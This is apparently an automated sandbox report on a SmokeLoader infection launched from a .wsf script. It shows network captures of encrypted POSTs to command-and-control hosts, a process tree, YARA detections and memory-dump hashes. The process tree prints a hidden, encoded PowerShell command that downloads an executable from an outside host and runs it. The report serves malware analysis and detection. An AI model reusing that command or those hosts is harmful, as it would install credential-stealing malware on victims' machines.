                                                                                                          Oct 4, 2024 16:36:36.183960915 CEST892INData Raw: 05 cc 3f 51 00 77 37 6a 04 e8 9a f2 ff ff 59 89 7d fc ff 75 08 e8 a0 fa ff ff 59 89 45 e4 c7 45 fc fe ff ff ff e8 5f 00 00 00 8b 5d e4 3b df 74 11 ff 75 08 57 53 e8 f6 32 00 00 83 c4 0c 3b df 75 61 56 6a 08 ff 35 a4 da 41 00 ff 15 e8 90 41 00 8b
                                                                                                          Data Ascii: ?Qw7jY}uYEE_];tuWS2;uaVj5AA;uL9=At3VB&YrE;PE3uj>Y;uE;t<UVWuMEu3;t0;u,WWWWW}tE
                                                                                                          Oct 4, 2024 16:36:36.185261011 CEST1236INData Raw: 10 40 4f 75 f7 8d 86 1d 01 00 00 be 00 01 00 00 8a 14 08 88 10 40 4e 75 f7 5f 5e c3 8b ff 55 8b ec 81 ec 1c 05 00 00 a1 08 c0 41 00 33 c5 89 45 fc 53 57 8d 85 e8 fa ff ff 50 ff 76 04 ff 15 f4 90 41 00 bf 00 01 00 00 85 c0 0f 84 fb 00 00 00 33 c0
                                                                                                          Data Ascii: @Ou@Nu_^UA3ESWPvA3@;r t.;w+@Pj R#/CCujvvPWPjj63SvWPWPWvS3DSvWPW
                                                                                                          Oct 4, 2024 16:36:36.185349941 CEST1236INData Raw: 5f 68 8b 75 08 e8 75 fd ff ff 89 45 08 3b 43 04 0f 84 57 01 00 00 68 20 02 00 00 e8 21 25 00 00 59 8b d8 85 db 0f 84 46 01 00 00 b9 88 00 00 00 8b 77 68 8b fb f3 a5 83 23 00 53 ff 75 08 e8 b8 fd ff ff 59 59 89 45 e0 85 c0 0f 85 fc 00 00 00 8b 75
                                                                                                          Data Ascii: _huuE;CWh !%YFwh#SuYYEuvhAuFh=AtPY^hS=AFpAjYeCACACA3E}fLCfEA@3E=}LA@3E=
                                                                                                          Oct 4, 2024 16:36:36.189021111 CEST1236INData Raw: 21 a1 c0 c8 41 00 83 f8 ff 74 17 50 ff 35 c4 c8 41 00 ff d6 ff d0 85 c0 74 08 8b 80 f8 01 00 00 eb 27 be 80 92 41 00 56 ff 15 2c 90 41 00 85 c0 75 0b 56 e8 5d dd ff ff 59 85 c0 74 18 68 70 92 41 00 50 ff 15 6c 90 41 00 85 c0 74 08 ff 75 08 ff d0
                                                                                                          Data Ascii: !AtP5At'AV,AuV]YthpAPlAtuEE^]jYUV5A5At!AtP5At'AV,AuVYthAPlAtuEE^]AV5AAu


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          1192.168.2.749845193.46.217.78804056C:\Windows\explorer.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Oct 4, 2024 16:37:05.226434946 CEST287OUTPOST /index.php HTTP/1.1
                                                                                                          Connection: Keep-Alive
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          Accept: */*
                                                                                                          Referer: http://xedfkhosquhy.org/
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                          Content-Length: 183
                                                                                                          Host: unicexpertmagazine.pw
                                                                                                          Oct 4, 2024 16:37:05.226464033 CEST183OUTData Raw: a1 5f 0f 5c f6 36 2a cc c0 3b a7 b9 8c c2 2a 47 50 32 c4 5b 61 bb 36 55 dc 55 cc 18 03 8e 70 55 bf 53 af 8c 4e a3 72 4d 2a cd cd 03 a8 44 19 34 b2 66 7b 55 e2 62 2e 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be f9 32 2b ac
                                                                                                          Data Ascii: _\6*;*GP2[a6UUpUSNrM*D4f{Ub.-^JrC)2+YJQe{\x1P{S+-6i@6_e<`YM.dQcd)@#J~i/iVKxr$
                                                                                                          Oct 4, 2024 16:37:06.339015961 CEST602INHTTP/1.1 404 Not Found
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 04 Oct 2024 14:37:06 GMT
                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Data Raw: 31 61 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 [TRUNCATED]
                                                                                                          Data Ascii: 1a2<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at unicexpertmagazine.pw Port 80</address></body></html>0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          2192.168.2.749856188.40.141.211804056C:\Windows\explorer.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Oct 4, 2024 16:37:06.825609922 CEST291OUTPOST /index.php HTTP/1.1
                                                                                                          Connection: Keep-Alive
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          Accept: */*
                                                                                                          Referer: http://utsxpdquoutvtc.com/
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                          Content-Length: 275
                                                                                                          Host: ceoconstractionstore.pl
                                                                                                          Oct 4, 2024 16:37:06.825619936 CEST275OUTData Raw: a1 5f 0f 5c f6 36 2a cc c0 3b a7 b9 8c c2 2a 47 50 32 c4 5b 61 bb 36 55 dc 55 cc 18 03 8e 70 55 bf 53 af 8c 4e a3 72 4d 2a cd cd 03 a8 44 19 34 b2 66 7b 55 e2 62 2e 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be e0 3d 46 b6
                                                                                                          Data Ascii: _\6*;*GP2[a6UUpUSNrM*D4f{Ub.-^JrC)=F9^:<AKdjILZD#cDDvFLJmj:,<Vs9=lP'yn[`X;^Uw19A6c?8$s)w![{x`C9-%r
                                                                                                          Oct 4, 2024 16:37:07.713541985 CEST151INHTTP/1.1 404 Not Found
                                                                                                          Server: nginx/1.18.0
                                                                                                          Content-Length: 7
                                                                                                          Content-Type: application/octet-stream
                                                                                                          Date: Fri, 04 Oct 2024 14:37:07 GMT
                                                                                                          Data Raw: 03 00 00 00 7d 4f d6
                                                                                                          Data Ascii: }O
                                                                                                          Oct 4, 2024 16:37:07.718485117 CEST292OUTPOST /index.php HTTP/1.1
                                                                                                          Connection: Keep-Alive
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          Accept: */*
                                                                                                          Referer: http://rfcqeahtpbrxjuy.net/
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                          Content-Length: 226
                                                                                                          Host: ceoconstractionstore.pl
                                                                                                          Oct 4, 2024 16:37:07.718486071 CEST226OUTData Raw: a1 5f 0f 5c f6 36 2a cc c0 3b a7 b9 8c c2 2a 47 50 32 c4 5b 61 bb 36 55 dc 55 cc 18 03 8e 70 55 bf 53 af 8c 4e a3 72 4d 2a cd cd 03 a8 44 19 34 b2 66 7b 55 e2 62 2e 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 1b 1d bc ca bf 4a 73 43 29 be e8 59 26 97
                                                                                                          Data Ascii: _\6*;*GP2[a6UUpUSNrM*D4f{Ub.-^JsC)Y&7fF.{}f/N(A^O<5Qy` 6S(JyZW[q! 7T}\z$axpEvTj#OoAn6{ Y8yi{{"
                                                                                                          Oct 4, 2024 16:37:08.056991100 CEST144INHTTP/1.1 404 Not Found
                                                                                                          Server: nginx/1.18.0
                                                                                                          Content-Length: 0
                                                                                                          Content-Type: application/octet-stream
                                                                                                          Date: Fri, 04 Oct 2024 14:37:07 GMT
                                                                                                          Oct 4, 2024 16:37:32.796794891 CEST293OUTPOST /index.php HTTP/1.1
                                                                                                          Connection: Keep-Alive
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          Accept: */*
                                                                                                          Referer: http://fwtilsrhssulldop.com/
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                          Content-Length: 281
                                                                                                          Host: ceoconstractionstore.pl
                                                                                                          Oct 4, 2024 16:37:32.796825886 CEST281OUTData Raw: a1 5f 0f 5c f6 36 2a cc c0 3b a7 b9 8c c2 2a 47 50 32 c4 5b 61 bb 36 55 dc 55 cc 18 03 8e 70 55 bf 53 af 8c 4e a3 72 4d 2a cd cd 03 a8 44 19 34 b2 66 7b 55 e2 62 2e 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be ee 30 69 96
                                                                                                          Data Ascii: _\6*;*GP2[a6UUpUSNrM*D4f{Ub.-^JrC)0i8J.Nn<gM7@\[^fCdq&|-N`S@z"vR1a0{GVdmyvOkzV{[UxcGWm,z>
                                                                                                          Oct 4, 2024 16:37:33.136367083 CEST151INHTTP/1.1 404 Not Found
                                                                                                          Server: nginx/1.18.0
                                                                                                          Content-Length: 7
                                                                                                          Content-Type: application/octet-stream
                                                                                                          Date: Fri, 04 Oct 2024 14:37:33 GMT
                                                                                                          Data Raw: 03 00 00 00 7d 4f d6
                                                                                                          Data Ascii: }O
                                                                                                          Oct 4, 2024 16:37:33.144893885 CEST288OUTPOST /index.php HTTP/1.1
                                                                                                          Connection: Keep-Alive
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          Accept: */*
                                                                                                          Referer: http://ooxywteyveq.com/
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                          Content-Length: 332
                                                                                                          Host: ceoconstractionstore.pl
                                                                                                          Oct 4, 2024 16:37:33.144922018 CEST332OUTData Raw: a1 5f 0f 5c f6 36 2a cc c0 3b a7 b9 8c c2 2a 47 50 32 c4 5b 61 bb 36 55 dc 55 cc 18 03 8e 70 55 bf 53 af 8c 4e a3 72 4d 2a cd cd 03 a8 44 19 34 b2 66 7b 55 e2 62 2e 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 1b 1d bc ca bf 4a 73 43 29 be f2 57 4a c4
                                                                                                          Data Ascii: _\6*;*GP2[a6UUpUSNrM*D4f{Ub.-^JsC)WJuo6~sN5J52+=#;?',7I$m}QZE_Y+Vd-v|r7sB*?HHek4ybw9>i J(GbXq,ecj8jC]
                                                                                                          Oct 4, 2024 16:37:33.488718987 CEST144INHTTP/1.1 404 Not Found
                                                                                                          Server: nginx/1.18.0
                                                                                                          Content-Length: 0
                                                                                                          Content-Type: application/octet-stream
                                                                                                          Date: Fri, 04 Oct 2024 14:37:33 GMT


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          3192.168.2.749974193.46.217.78804056C:\Windows\explorer.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Oct 4, 2024 16:37:30.667890072 CEST290OUTPOST /index.php HTTP/1.1
                                                                                                          Connection: Keep-Alive
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          Accept: */*
                                                                                                          Referer: http://obbtjayrfmnjdrv.net/
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                          Content-Length: 163
                                                                                                          Host: unicexpertmagazine.pw
                                                                                                          Oct 4, 2024 16:37:30.667933941 CEST163OUTData Raw: a1 5f 0f 5c f6 36 2a cc c0 3b a7 b9 8c c2 2a 47 50 32 c4 5b 61 bb 36 55 dc 55 cc 18 03 8e 70 55 bf 53 af 8c 4e a3 72 4d 2a cd cd 03 a8 44 19 34 b2 66 7b 55 e2 62 2e 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be 83 3c 7a d5
                                                                                                          Data Ascii: _\6*;*GP2[a6UUpUSNrM*D4f{Ub.-^JrC)<z)1SVK]/gZER)?HQ'jsNIu4xj?@R"`L8
                                                                                                          Oct 4, 2024 16:37:32.793679953 CEST602INHTTP/1.1 404 Not Found
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 04 Oct 2024 14:37:32 GMT
                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Data Raw: 31 61 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 [TRUNCATED]
                                                                                                          Data Ascii: 1a2<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at unicexpertmagazine.pw Port 80</address></body></html>0


                                                                                                          Click to jump to process

                                                                                                          Click to jump to process

                                                                                                          Click to dive into process behavior distribution

                                                                                                          Click to jump to process

                                                                                                          Target ID:0
                                                                                                          Start time:10:36:29
                                                                                                          Start date:04/10/2024
                                                                                                          Path:C:\Windows\System32\wscript.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\w4DO1Z18yg.wsf"
                                                                                                          Imagebase:0x7ff6e20b0000
                                                                                                          File size:170'496 bytes
                                                                                                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          Target ID:2
                                                                                                          Start time:10:36:30
                                                                                                          Start date:04/10/2024
                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=
                                                                                                          Imagebase:0x7ff7f3c20000
                                                                                                          File size:289'792 bytes
                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          Target ID:3
                                                                                                          Start time:10:36:30
                                                                                                          Start date:04/10/2024
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff75da10000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          Target ID:4
                                                                                                          Start time:10:36:30
                                                                                                          Start date:04/10/2024
                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=
                                                                                                          Imagebase:0x7ff741d30000
                                                                                                          File size:452'608 bytes
                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          Target ID:12
                                                                                                          Start time:10:36:35
                                                                                                          Start date:04/10/2024
                                                                                                          Path:C:\Users\user\AppData\Local\Temp\oBuf.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Users\user~1\AppData\Local\Temp\oBuf.exe"
                                                                                                          Imagebase:0x400000
                                                                                                          File size:222'720 bytes
                                                                                                          MD5 hash:31059E7394B880F017E83804D9B716AB
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000C.00000002.1426355284.00000000007E1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000C.00000002.1426355284.00000000007E1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000C.00000002.1426518576.00000000008DE000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000C.00000002.1426166777.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000C.00000002.1426166777.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000000C.00000002.1426113071.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                          Antivirus matches:
                                                                                                          • Detection: 100%, Avira
                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                          • Detection: 88%, ReversingLabs
                                                                                                          Reputation:low
                                                                                                          Has exited:true

                                                                                                          Target ID:14
                                                                                                          Start time:10:36:45
                                                                                                          Start date:04/10/2024
                                                                                                          Path:C:\Windows\explorer.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\Explorer.EXE
                                                                                                          Imagebase:0x7ff70ffd0000
                                                                                                          File size:5'141'208 bytes
                                                                                                          MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000E.00000002.2505713156.000000000AC41000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000E.00000002.2505713156.000000000AC41000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000E.00000002.2501060273.0000000008381000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000E.00000002.2501060273.0000000008381000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                          Reputation:high
                                                                                                          Has exited:false

                                                                                                          Target ID:15
                                                                                                          Start time:12:03:32
                                                                                                          Start date:04/10/2024
                                                                                                          Path:C:\Users\user\AppData\Roaming\tesubba
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:C:\Users\user\AppData\Roaming\tesubba
                                                                                                          Imagebase:0x400000
                                                                                                          File size:222'720 bytes
                                                                                                          MD5 hash:31059E7394B880F017E83804D9B716AB
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000F.00000002.1688228770.0000000002060000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000F.00000002.1688228770.0000000002060000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000F.00000002.1688128712.00000000005CD000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000000F.00000002.1688048281.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000F.00000002.1688289070.00000000020A1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000F.00000002.1688289070.00000000020A1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                          Antivirus matches:
                                                                                                          • Detection: 100%, Avira
                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                          • Detection: 88%, ReversingLabs
                                                                                                          Reputation:low
                                                                                                          Has exited:true

                                                                                                          Reset < >
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.1366733857.00007FFAACC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_7ffaacc90000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e4826b53d8e6138fa2a114826cae0d2a545e101d7b5e826c98993e93a119ed71
                                                                                                            • Instruction ID: e877a764f4b30918da77f3291981ab288041794cf215596810202e4c3415c677
                                                                                                            • Opcode Fuzzy Hash: e4826b53d8e6138fa2a114826cae0d2a545e101d7b5e826c98993e93a119ed71
                                                                                                            • Instruction Fuzzy Hash: D4E1176290EB869FF3969B6858665B57FD0EF57210B0841FED08DC70D3EA1D984983C2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.1366733857.00007FFAACC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_7ffaacc90000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e1ed105666d62595baeb07e9947c05cd7f8e939cdb83daa04a99ab81d928b04c
                                                                                                            • Instruction ID: 40218260a13484270e69a99b48cbb9ddfc17d6551953a571bfbbf47042c0b070
                                                                                                            • Opcode Fuzzy Hash: e1ed105666d62595baeb07e9947c05cd7f8e939cdb83daa04a99ab81d928b04c
                                                                                                            • Instruction Fuzzy Hash: 7F214562E1FB8A9BF3A59BAC585517876C1EF4B210B4840BAD04DC30D3DE1EEC4883C2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.1365778021.00007FFAACBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBC0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_7ffaacbc0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                            • Instruction ID: c00291851c6933f688f7a36812458a736db23e518c8502221226abf138f4f0b9
                                                                                                            • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                            • Instruction Fuzzy Hash: 9201677111CB0D8FD744EF0CE451AA6B7E0FB99364F50056DE58AC3691DB36E882CB45

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:8.5%
                                                                                                            Dynamic/Decrypted Code Coverage:19.9%
                                                                                                            Signature Coverage:49.4%
                                                                                                            Total number of Nodes:156
                                                                                                            Total number of Limit Nodes:6
